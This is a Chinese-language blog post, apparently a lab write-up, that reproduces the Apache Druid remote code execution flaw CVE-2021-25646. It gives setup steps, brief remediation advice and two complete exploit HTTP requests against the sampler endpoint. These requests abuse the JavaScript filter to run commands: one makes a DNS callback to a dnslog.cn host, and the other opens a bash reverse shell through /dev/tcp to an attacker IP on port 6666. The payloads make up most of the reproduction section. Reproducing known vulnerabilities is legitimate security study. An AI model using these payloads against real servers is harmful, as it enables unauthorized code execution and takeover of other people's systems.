Apache Druid 命令执行漏洞复现(CVE-2021-25646)
学习笔记下载
https://download.csdn.net/download/qq_41901122/15051281
文章目录
- 学习笔记下载
- 漏洞编号
- 漏洞描述
- 影响版本
- 环境搭建
- 第一步 安装jdk8环境
- 第二步 搭建Druid
- 第三步 访问8888端口
- 漏洞复现
- 查找漏洞点
- 方法一:DNS解析
- 方法二:反弹shell
- 修复建议
- 摘抄
漏洞编号
- CVE-2021-25646
- 发布时间:2021-01-29
- 漏洞等级:高
漏洞描述
- Apache Druid 是一个分布式的数据处理系统。
- Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。
- 此功能在用于高信任度环境中,默认已被禁用。
- 在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
- 攻击者可直接构造恶意请求执行任意代码,控制服务器
影响版本
- Apache Druid < 0.20.1
环境搭建
第一步 安装jdk8环境
sudo apt-get updatesudo apt-get install openjdk-8-jdkjava -versionwhich javac 查看安装位置
第二步 搭建Druid
tar-zxvf apache-druid-0.20.0-bin.tar.gzcd apache-druid-0.20.0cd bin./start-micro-quickstart
第三步 访问8888端口
http://192.168.232.183:8888/unified-console.html
漏洞复现
查找漏洞点
方法一:DNS解析
POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.232.183:8888Content-Length: 1019Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56Content-Type: application/json;charset=UTF-8Origin: http://192.168.232.183:8888Referer: http://192.168.232.183:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close{ "type": "index", "spec": { "ioConfig": { "type": "index", "inputSource": { "type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-14T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": { "type": "json", "keepNullColumns": true}}, "dataSchema": { "dataSource": "sample", "timestampSpec": { "column": "timestamp", "format": "iso"}, "dimensionsSpec": { }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping qojh5x.dnslog.cn')}", "": { "enabled": true}}}}, "type": "index", "tuningConfig": { "type": "index"}}, "samplerConfig": { "numRows": 500, "timeoutMs": 15000}}
方法二:反弹shell
POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.232.183:8888Content-Length: 1047Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56Content-Type: application/json;charset=UTF-8Origin: http://192.168.232.183:8888Referer: http://192.168.232.183:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close{ "type": "index", "spec": { "ioConfig": { "type": "index", "inputSource": { "type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-14T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": { "type": "json", "keepNullColumns": true}}, "dataSchema": { "dataSource": "sample", "timestampSpec": { "column": "timestamp", "format": "iso"}, "dimensionsSpec": { }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.232.140/6666 0>&1')}", "": { "enabled": true}}}}, "type": "index", "tuningConfig": { "type": "index"}}, "samplerConfig": { "numRows": 500, "timeoutMs": 15000}}
修复建议
- 及时更新Apache Druid
- 配置访问白名单等控制访问权限。
摘抄
揉碎的星河撒下,化成流星撒向天际,
我站在满天星光下,许愿:
不要急,想要的都会在努力下,慢慢来到。
àì夳堔傛蜴生んèń
绝地灬酷狼
╰+攻爆jí腚メ
傷城~
向右看齐
小鱼儿
小灰灰
还没有评论,来说两句吧...